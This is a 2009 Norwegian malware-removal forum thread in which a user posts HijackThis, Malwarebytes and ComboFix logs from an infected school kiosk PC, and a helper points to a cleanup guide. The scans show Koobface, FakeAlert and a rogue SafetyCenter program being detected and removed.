[Løst]Hjelp til analyse av HJT-logg

hlnd · 15. oktober 2009

Felles-PC på skolen som noen har blitt infisert; kjørt bitdefender sin onlinescanner og en MacAfee scan av AV-programvaren som ligger på maskinene, men som alikevel tydeligvis har sluppet noe gjennom.

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 22:23:13, on 15.10.2009

Platform: Windows XP SP3 (WinNT 5.01.2600)

MSIE: Internet Explorer v7.00 (7.00.6000.16915)

Boot mode: Normal

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\spoolsv.exe

c:\windows\system32\cistub.exe

c:\epoagent\Common Framework\FrameworkService.exe

C:\Programfiler\McAfee\VirusScan Enterprise\Mcshield.exe

C:\Programfiler\McAfee\VirusScan Enterprise\VsTskMgr.exe

C:\Programfiler\UPHClean\uphclean.exe

c:\epoagent\Common Framework\UdaterUI.exe

c:\epoagent\Common Framework\McTray.exe

C:\WINDOWS\system32\mshta.exe

C:\WINDOWS\system32\hkcmd.exe

C:\Programfiler\CapaInstaller\Client\Util\JobTrig.exe

C:\Programfiler\McAfee\VirusScan Enterprise\SHSTAT.EXE

C:\WINDOWS\system32\wuauclt.exe

C:\WINDOWS\system32\ctfmon.exe

C:\Programfiler\Messenger\msmsgs.exe

C:\WINDOWS\system32\ctfmon.exe

C:\WINDOWS\Explorer.exe

C:\Programfiler\Internet Explorer\IEXPLORE.EXE

C:\Documents and Settings\kiosk\Mine dokumenter\Programfiler\Opera10usb\OperaUSB.exe

C:\Documents and Settings\kiosk\Mine dokumenter\Downloads\spies.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://search.qip.ru

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.qip.ru

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.qip.ru/ie

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.qip.ru

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.qip.ru/ie

R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = Root: HKCU; Subkey: Software\Microsoft\Internet Explorer\SearchUrl; ValueType: string; ValueName: '; ValueData: '; Flags: createvalueifdoesntexist noerror; Tasks: AddSearchQip

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koblinger

R3 - URLSearchHook: QIPBHO Class - {A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE} - C:\Documents and Settings\kiosk\Programdata\Microsoft\Internet Explorer\qipsearchbar.dll

R3 - URLSearchHook: (no name) - - (no file)

O2 - BHO: Koblingshjelpeprogram for Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programfiler\Fellesfiler\Adobe\Acrobat\ActiveX\AcroIEHelper.dll

O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programfiler\Java\jre1.5.0_11\bin\ssv.dll

O2 - BHO: QIPBHO - {A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE} - C:\Documents and Settings\kiosk\Programdata\Microsoft\Internet Explorer\qipsearchbar.dll

O2 - BHO: (no name) - {DD1984BA-25E1-4F56-B124-A07ED6B2A87F} - C:\DOCUME~1\kiosk\LOKALE~1\Temp\ho.dll

O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\system32\igfxtray.exe

O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe

O4 - HKLM\..\Run: [CapaInstaller Info Center] "C:\Programfiler\CapaInstaller\Client\Util\JobTrig.exe" /autostart

O4 - HKLM\..\Run: [McAfeeUpdaterUI] "c:\epoagent\Common Framework\UdaterUI.exe" /StartedFromRunKey

O4 - HKLM\..\Run: [shStatEXE] "C:\Programfiler\McAfee\VirusScan Enterprise\SHSTAT.EXE" /STANDALONE

O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programfiler\Adobe\Reader 8.0\Reader\Reader_sl.exe"

O4 - HKLM\..\Run: [ikiosk33] C:\Programfiler\Internet Kiosk Pro\kiosk.exe run

O4 - HKLM\..\Run: [sysldtray] C:\windows\ld15.exe

O4 - HKLM\..\Run: [pp] C:\windows\pp12.exe

O4 - HKLM\..\RunOnce: [safetyCenter] C:\Programfiler\SafetyCenter\start.exe

O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe

O4 - HKCU\..\Run: [MSMSGS] "C:\Programfiler\Messenger\msmsgs.exe" /background

O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'LOKAL TJENESTE')

O4 - HKUS\S-1-5-19\..\Run: [Communicator] "C:\Programfiler\Microsoft Office Communicator\Communicator.exe" (User 'LOKAL TJENESTE')

O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'NETTVERKSTJENESTE')

O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')

O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')

O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present

O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programfiler\Java\jre1.5.0_11\bin\ssv.dll

O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programfiler\Java\jre1.5.0_11\bin\ssv.dll

O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe

O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe

O9 - Extra button: Oppslag - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL

O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programfiler\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programfiler\Messenger\msmsgs.exe

O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/...can8/oscan8.cab

O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdat...b?1221728141109

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = fifk.vgs.no

O17 - HKLM\Software\..\Telephony: DomainName = fifk.vgs.no

O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = fifk.vgs.no

O23 - Service: CapaInstaller Agent Service (cistub) - CapaSystems A/S - c:\windows\system32\cistub.exe

O23 - Service: McAfee Framework Service (McAfeeFramework) - McAfee, Inc. - c:\epoagent\Common Framework\FrameworkService.exe

O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Programfiler\McAfee\VirusScan Enterprise\Mcshield.exe

O23 - Service: McAfee Task Manager (McTaskManager) - McAfee, Inc. - C:\Programfiler\McAfee\VirusScan Enterprise\VsTskMgr.exe

--

End of file - 7144 bytes

C:\Documents and Settings\kiosk\Mine dokumenter\Downloads\spies.exe er hijackthis.

Takk på forhånd!

Endret 26. oktober 2009 av Bl4cKnD

norbat · 16. oktober 2009

Det ligger litt rusk der. Kjør gjennom veiledningen og post loggene her i din egen tråd.

hlnd · 19. oktober 2009

Takker for svar For øyeblikket på høstferie, kjører gjennom guiden din når jeg kommer tilbake.

hlnd · 26. oktober 2009

Sånn.

MBAM:

Malwarebytes' Anti-Malware 1.41

Databaseversjon: 3035

Windows 5.1.2600 Service Pack 3

26.10.2009 15:57:13

mbam-log-2009-10-26 (15-57-13).txt

Skanntype: Rask Skann

Objekter skannet: 126261

Tid tilbakelagt: 5 minute(s), 53 second(s)

Minneprosesser infisert: 0

Minnemoduler infisert: 1

Registernøkler infisert: 12

Registerverdier infisert: 5

Registerfiler infisert: 8

Mapper infisert: 1

Filer infisert: 22

Minneprosesser infisert:

(Ingen mistenkelige filer funnet)

Minnemoduler infisert:

C:\Documents and Settings\kiosk\Lokale innstillinger\Temp\ho.dll (Trojan.FakeAlert) -> Delete on reboot.

Registernøkler infisert:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{dd1984ba-25e1-4f56-b124-a07ed6b2a87f} (Trojan.BHO.H) -> Quarantined and deleted successfully.

HKEY_CLASSES_ROOT\CLSID\{dd1984ba-25e1-4f56-b124-a07ed6b2a87f} (Trojan.BHO.H) -> Quarantined and deleted successfully.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{dd1984ba-25e1-4f56-b124-a07ed6b2a87f} (Trojan.FakeAlert) -> Quarantined and deleted successfully.

HKEY_CLASSES_ROOT\CLSID\{25ecc7c8-331f-4758-8371-1d34c1e6a983} (Rogue.SafetyCenter) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{25ecc7c8-331f-4758-8371-1d34c1e6a983} (Rogue.SafetyCenter) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{25ecc7c8-331f-4758-8371-1d34c1e6a983} (Rogue.SafetyCenter) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{25ecc7c8-331f-4758-8371-1d34c1e6a983} (Rogue.SafetyCenter) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\NetworkNeighborhood\NameSpace\{25ecc7c8-331f-4758-8371-1d34c1e6a983} (Rogue.SafetyCenter) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\safetycenter (Trojan.SafetyCenter) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\SOFTWARE\SafetyCenter (Malware.Trace) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\fioo32 (Worm.KoobFace) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Enum\Root\LEGACY_FIOO32 (Worm.KoobFace) -> Quarantined and deleted successfully.

Registerverdier infisert:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray (Worm.Koobface) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pp (Trojan.Agent) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysfbtray (Worm.Koobface) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\safetycenter (Rogue.Installer) -> Quarantined and deleted successfully.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\fioo32 (Worm.KoobFace) -> Quarantined and deleted successfully.

Registerfiler infisert:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecycleFiles (Disable.Recycle) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL (Hijack.DisplayProperties) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders (Hijack.Explorer) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize (Hijack.Explorer) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind (Hijack.Find) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions (Hijack.FolderOptions) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp (Hijack.Help) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr (Hijack.TaskManager) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Mapper infisert:

C:\Programfiler\SafetyCenter (Trojan.SafetyCenter) -> Quarantined and deleted successfully.

Filer infisert:

C:\Documents and Settings\kiosk\Lokale innstillinger\Temp\ho.dll (Trojan.BHO.H) -> Delete on reboot.

C:\WINDOWS\ld15.exe (Worm.Koobface) -> Quarantined and deleted successfully.

C:\WINDOWS\pp12.exe (Trojan.Agent) -> Quarantined and deleted successfully.

C:\WINDOWS\freddy71.exe (Worm.Koobface) -> Quarantined and deleted successfully.

C:\Programfiler\SafetyCenter\start.exe (Rogue.Installer) -> Quarantined and deleted successfully.

C:\Documents and Settings\kiosk\Lokale innstillinger\Temp\settings.exe (Trojan.Downloader) -> Quarantined and deleted successfully.

C:\Documents and Settings\kiosk\Lokale innstillinger\Temp\update.exe (Rogue.Installer) -> Quarantined and deleted successfully.

C:\Programfiler\SafetyCenter\main.ico (Trojan.SafetyCenter) -> Quarantined and deleted successfully.

C:\Programfiler\SafetyCenter\new.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.

C:\Programfiler\SafetyCenter\protector.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.

C:\Programfiler\SafetyCenter\sound.wav (Trojan.SafetyCenter) -> Quarantined and deleted successfully.

C:\Programfiler\SafetyCenter\uninstall.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.

C:\WINDOWS\rdr_1255600135.exe (Worm.KoobFace) -> Quarantined and deleted successfully.

C:\WINDOWS\rdr_1255600142.exe (Worm.KoobFace) -> Quarantined and deleted successfully.

C:\WINDOWS\rdr_1256543237.exe (Worm.KoobFace) -> Quarantined and deleted successfully.

C:\WINDOWS\rdr_1256543238.exe (Worm.KoobFace) -> Quarantined and deleted successfully.

C:\WINDOWS10112010146116101.xxe (KoobFace.Trace) -> Quarantined and deleted successfully.

C:\WINDOWS101120101464855.xxe (KoobFace.Trace) -> Quarantined and deleted successfully.

C:\WINDOWS101120101464955.xxe (KoobFace.Trace) -> Quarantined and deleted successfully.

C:\WINDOWS101120101465249.xxe (KoobFace.Trace) -> Quarantined and deleted successfully.

C:\WINDOWS\bk23567.dat (KoobFace.Trace) -> Quarantined and deleted successfully.

C:\WINDOWS\fdgg34353edfgdfdf (KoobFace.Trace) -> Quarantined and deleted successfully.

Combofix:

ComboFix 09-10-25.02 - kiosk 26.10.2009 16:17.1.1 - NTFSx86

Microsoft Windows XP Professional 5.1.2600.3.1252.47.1044.18.510.252 [GMT 1:00]

Kjører fra: c:\documents and settings\kiosk\Mine dokumenter\Downloads\ComboFix.exe

AV: McAfee VirusScan Enterprise *On-access scanning disabled* (Updated) {918A2B0B-2C60-4016-A4AB-E868DEABF7F0}

.

((((((((((((((((((((((((((((((((((((((( Andre slettinger )))))))))))))))))))))))))))))))))))))))))))))))))

.

C:\data

c:\documents and settings\All Users\Programdata\Microsoft\Network\Downloader\qmgr0.dat

c:\documents and settings\All Users\Programdata\Microsoft\Network\Downloader\qmgr1.dat

c:\windows10112010146101105.rx

c:\windows\system32\NTSVc.ocx

----- BITS: Mulige infiserte sider -----

hxxp://wsus3

.

((((((((((((((((((((((((((( Filer Opprettet Fra 2009-09-26 til 2009-10-26 )))))))))))))))))))))))))))))))))

.

2009-10-26 14:59 . 2009-10-26 14:59 -------- d--h--r- c:\documents and settings\kiosk\Siste

2009-10-26 14:49 . 2009-10-26 14:49 -------- d-----w- c:\documents and settings\kiosk\Programdata\Malwarebytes

2009-10-26 14:49 . 2009-09-10 13:54 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys

2009-10-26 14:49 . 2009-10-26 14:49 -------- d-----w- c:\documents and settings\All Users\Programdata\Malwarebytes

2009-10-26 14:49 . 2009-09-10 13:53 19160 ----a-w- c:\windows\system32\drivers\mbam.sys

2009-10-15 20:03 . 2009-10-15 20:05 -------- d-----w- c:\documents and settings\kiosk\Lokale innstillinger\Programdata\Adobe

2009-10-15 16:15 . 2009-10-15 17:58 -------- d-----w- c:\windows\BDOSCAN8

2009-10-15 06:29 . 2009-10-15 06:29 -------- d-----w- c:\documents and settings\kiosk\Lokale innstillinger\Programdata\PCHealth

2009-10-14 14:33 . 2009-07-17 16:22 1436672 -c----w- c:\windows\system32\dllcache\query.dll

2009-10-14 14:33 . 2009-09-04 21:05 58880 -c----w- c:\windows\system32\dllcache\msasn1.dll

2009-10-14 09:20 . 2009-10-14 09:20 2198 ----a-w- C:\nAi.bat

2009-10-14 06:23 . 2009-10-26 14:41 -------- d-----w- C:\Quarantine

2009-10-11 10:06 . 2009-10-11 10:06 -------- d--h--w- c:\windows\PIF

2009-10-11 09:45 . 2009-10-11 10:00 -------- d-----w- c:\programfiler\Samurize

2009-10-04 12:54 . 2009-10-04 12:54 -------- d-----w- c:\documents and settings\kiosk\Lokale innstillinger\Programdata\ApplicationHistory

2009-10-01 16:50 . 2009-10-01 16:52 -------- d-----w- C:\d1b15194f2c5a89b99bc

2009-10-01 16:49 . 2009-10-01 16:50 -------- d-----w- c:\programfiler\QIP

2009-09-29 12:48 . 2009-09-29 12:48 -------- d-----w- c:\windows\Sun

.

(((((((((((((((((((((((((((((((((((((((( Find3M Rapport ))))))))))))))))))))))))))))))))))))))))))))))))))))

.

2009-10-26 15:27 . 2009-09-25 10:51 -------- d-----w- c:\programfiler\Internet Kiosk Pro

2009-10-26 08:21 . 2001-10-09 12:00 79648 ----a-w- c:\windows\system32\perfc014.dat

2009-10-26 08:21 . 2001-10-09 12:00 444036 ----a-w- c:\windows\system32\perfh014.dat

2009-09-25 13:34 . 2009-09-25 13:34 0 ----a-w- c:\windows\nsreg.dat

2009-09-25 09:01 . 2009-09-25 09:01 -------- d-----w- c:\programfiler\OpenXML-ODF Translator

2009-09-25 09:01 . 2009-09-25 09:01 -------- d-----w- c:\documents and settings\All Users\Programdata\iFinger

2009-09-25 09:00 . 2009-09-25 09:00 -------- d-----w- c:\programfiler\iFinger

2009-09-25 08:56 . 2009-09-25 08:56 262144 ----a-w- c:\windows\system32\default_user_class.dat

2009-09-25 08:56 . 2009-09-25 08:56 -------- d-----w- c:\programfiler\Microsoft SQL Server

2009-09-25 08:56 . 2009-09-25 08:56 -------- d-----w- c:\programfiler\Mathcad

2009-09-25 08:30 . 2009-09-25 08:30 -------- d-----w- c:\programfiler\UPHClean

2009-09-25 08:29 . 2009-09-25 08:29 -------- d-----w- c:\programfiler\Fronter AS

2009-09-25 08:29 . 2009-09-25 08:29 -------- d-----w- c:\programfiler\Microsoft Silverlight

2009-09-25 08:28 . 2009-09-25 08:28 -------- d-----w- c:\programfiler\Microsoft Office Communicator

2009-09-25 08:28 . 2009-09-25 08:28 -------- d-----w- c:\programfiler\activePDF

2009-09-25 08:21 . 2009-09-25 08:21 -------- d-----w- c:\programfiler\Samisk

2009-09-25 08:21 . 2009-09-25 08:20 -------- d-----w- c:\programfiler\Java

2009-09-25 08:20 . 2009-09-25 08:20 -------- d-----w- c:\programfiler\Fellesfiler\Java

2009-09-25 08:20 . 2009-09-25 08:19 -------- d-----w- c:\programfiler\Fellesfiler\Adobe

2009-09-25 08:14 . 2009-09-25 08:14 -------- d-----w- c:\programfiler\Microsoft Works

2009-09-25 08:13 . 2009-09-25 08:13 -------- d-----w- c:\programfiler\Microsoft.NET

2009-09-25 08:12 . 2009-09-25 08:11 -------- d-----w- c:\documents and settings\All Users\Programdata\McAfee

2009-09-25 08:12 . 2009-09-25 08:12 -------- d-----w- c:\programfiler\McAfee

2009-09-25 08:12 . 2009-09-25 08:12 -------- d-----w- c:\programfiler\Fellesfiler\McAfee

2009-09-25 08:11 . 2009-09-25 08:11 -------- d-----w- c:\programfiler\Fellesfiler\Cisco Systems

2009-09-25 08:10 . 2009-09-25 08:10 -------- d-----w- c:\programfiler\MSXML 4.0

2009-09-25 08:09 . 2009-09-25 08:06 -------- d-----w- c:\programfiler\CapaInstaller

2009-09-11 14:20 . 2001-10-09 12:00 136192 ----a-w- c:\windows\system32\msv1_0.dll

2009-09-10 08:43 . 2009-09-25 18:01 12352 ----a-w- c:\windows\system32\cistub.dat

2009-09-09 22:07 . 2009-09-09 22:07 -------- d-----w- c:\programfiler\MSBuild

2009-09-09 22:07 . 2009-09-09 22:07 -------- d-----w- c:\programfiler\Reference Assemblies

2009-09-04 21:05 . 2001-10-09 12:00 58880 ----a-w- c:\windows\system32\msasn1.dll

2009-08-29 07:32 . 2001-10-09 12:00 832512 ----a-w- c:\windows\system32\wininet.dll

2009-08-29 07:32 . 2008-09-16 11:15 78336 ----a-w- c:\windows\system32\ieencode.dll

2009-08-29 07:32 . 2001-10-09 12:00 17408 ----a-w- c:\windows\system32\corpol.dll

2009-08-26 08:02 . 2001-10-09 12:00 247326 ----a-w- c:\windows\system32\strmdll.dll

2009-08-06 17:24 . 2008-09-16 11:15 327896 ----a-w- c:\windows\system32\wucltui.dll

2009-08-06 17:24 . 2008-09-16 11:15 209632 ----a-w- c:\windows\system32\wuweb.dll

2009-08-06 17:24 . 2008-09-16 11:15 35552 ----a-w- c:\windows\system32\wups.dll

2009-08-06 17:24 . 2007-07-30 17:19 44768 ----a-w- c:\windows\system32\wups2.dll

2009-08-06 17:24 . 2008-09-16 22:35 53472 ----a-w- c:\windows\system32\wuauclt.exe

2009-08-06 17:24 . 2001-10-09 12:00 96480 ----a-w- c:\windows\system32\cdm.dll

2009-08-06 17:23 . 2008-09-16 11:15 575704 ----a-w- c:\windows\system32\wuapi.dll

2009-08-06 17:23 . 2008-09-16 22:35 1929952 ----a-w- c:\windows\system32\wuaueng.dll

2009-08-05 09:01 . 2001-10-09 12:00 204800 ----a-w- c:\windows\system32\mswebdvd.dll

2009-08-04 21:00 . 2001-10-09 12:00 2190976 ----a-w- c:\windows\system32\ntoskrnl.exe

2009-08-04 17:30 . 2001-10-06 13:26 2067840 ----a-w- c:\windows\system32\ntkrnlpa.exe

2009-07-29 04:38 . 2001-10-09 12:00 81920 ----a-w- c:\windows\system32\fontsub.dll

2009-07-29 04:38 . 2001-10-09 12:00 119808 ----a-w- c:\windows\system32\t2embed.dll

.

(((((((((((((((((((((((((((((((( Oppstartspunkter I Registeret )))))))))))))))))))))))))))))))))))))))))))))

.

*Merk* tomme oppføringer & gyldige standardoppføringer vises ikke

REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"MSMSGS"="c:\programfiler\Messenger\msmsgs.exe" [2008-04-14 1695232]

"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2008-04-14 15360]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"IgfxTray"="c:\windows\system32\igfxtray.exe" [2004-08-20 155648]

"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2004-08-20 118784]

"CapaInstaller Info Center"="c:\programfiler\CapaInstaller\Client\Util\JobTrig.exe" [2008-06-16 1070448]

"McAfeeUpdaterUI"="c:\epoagent\Common Framework\UdaterUI.exe" [2007-10-20 136512]

"ShStatEXE"="c:\programfiler\McAfee\VirusScan Enterprise\SHSTAT.EXE" [2008-07-16 111952]

"Adobe Reader Speed Launcher"="c:\programfiler\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2007-10-10 39792]

"ikiosk33"="c:\programfiler\Internet Kiosk Pro\kiosk.exe" [2006-05-11 2062336]

"Malwarebytes Anti-Malware (reboot)"="c:\documents and settings\kiosk\Mine dokumenter\Programfiler\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]

"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]

"Communicator"="c:\programfiler\Microsoft Office Communicator\Communicator.exe" [2005-05-12 4167376]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]

"DisableLockWorkstation"= 1 (0x1)

"DisableChangePassword"= 1 (0x1)

"DisableTaskMgr"= 1 (0x1)

"NoDispCPL"= 1 (0x1)

"NoSecCPL"= 1 (0x1)

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]

"NoMSAppLogo5ChannelNotify"= 1 (0x1)

"NoWelcomeScreen"= 1 (0x1)

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]

"NoSettingsWizards"= 1 (0x1)

"NoClose"= 1 (0x1)

"NoShellSearchButton"= 1 (0x1)

"NoControlPanel"= 1 (0x1)

"NoWinKeys"= 1 (0x1)

"NoRecycleFiles"= 1 (0x1)

"NoGoTo"= 1 (0x1)

"NoSMHelp"= 1 (0x1)

"NoHelp"= 1 (0x1)

"NoSMMyPictures"= 1 (0x1)

"NoStartMenuMyMusic"= 1 (0x1)

"NoSMMyDocs"= 1 (0x1)

"NoStartMenuNetworkPlaces"= 1 (0x1)

"NoFavoritesMenu"= 1 (0x1)

"NoNetworkConnections"= 1 (0x1)

"NoFind"= 1 (0x1)

"NoWindowsUpdate"= 1 (0x1)

"NoFolderOptions"= 1 (0x1)

"NoSetFolders"= 1 (0x1)

"NoSetTaskbar"= 1 (0x1)

"NoCustomizeWebView"= 1 (0x1)

"NoPrinters"= 1 (0x1)

"NoDesktop"= 1 (0x1)

"NoInternetIcon"= 1 (0x1)

"NoToolbarCustomize"= 1 (0x1)

"NoBandCustomize"= 1 (0x1)

"SpecifyDefaultButtons"= 1 (0x1)

"Btn_Folders"= 2 (0x2)

"Btn_Favorites"= 2 (0x2)

"Btn_Media"= 2 (0x2)

"Btn_History"= 2 (0x2)

"Btn_Fullscreen"= 2 (0x2)

"Btn_Tools"= 2 (0x2)

"Btn_MailNews"= 2 (0x2)

"Btn_Size"= 2 (0x2)

"Btn_Edit"= 2 (0x2)

"Btn_Discussions"= 2 (0x2)

"Btn_Cut"= 2 (0x2)

"Btn_Copy"= 2 (0x2)

"Btn_Paste"= 2 (0x2)

"Btn_Search"= 2 (0x2)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]

"%windir%\\system32\\sessmgr.exe"=

"%windir%\\Network Diagnostic\\xpnetdiag.exe"=

R0 vmscsi;vmscsi;c:\windows\system32\drivers\vmscsi.sys [30.11.2005 19:33 10880]

R2 cistub;CapaInstaller Agent Service;c:\windows\system32\CIStub.exe [25.09.2009 19:01 333168]

S0 ahcix86;ahcix86;c:\windows\system32\drivers\ahcix86.sys --> c:\windows\system32\drivers\ahcix86.sys [?]

S3 vmx_svga;vmx_svga;c:\windows\system32\drivers\vmx_svga.sys [10.09.2009 06:33 62768]

S3 vmxnet;VMware Ethernet Adapter Driver;c:\windows\system32\drivers\vmxnet.sys [10.09.2009 06:33 34992]

--- Andre tjenester/drivere lastet i minnet ---

*Deregistered* - mbr

*Deregistered* - PROCEXP113

*Deregistered* - uphcleanhlp

.

------- Tilleggsskanning -------

.

uDefault_Search_URL = hxxp://search.qip.ru

uInternet Connection Wizard,ShellNext = iexplore

uSearchURL,(Default) = Root: HKCU; Subkey: Software\Microsoft\Internet Explorer\SearchUrl; ValueType: string; ValueName: '; ValueData: '; Flags: createvalueifdoesntexist noerror; Tasks: AddSearchQip

FF - ProfilePath - c:\documents and settings\kiosk\Programdata\Mozilla\Firefox\Profiles\4k72hyaa.default\

FF - prefs.js: browser.search.selectedEngine - Google

FF - prefs.js: keyword.URL - hxxp://search.qip.ru/search?from=FF&query=

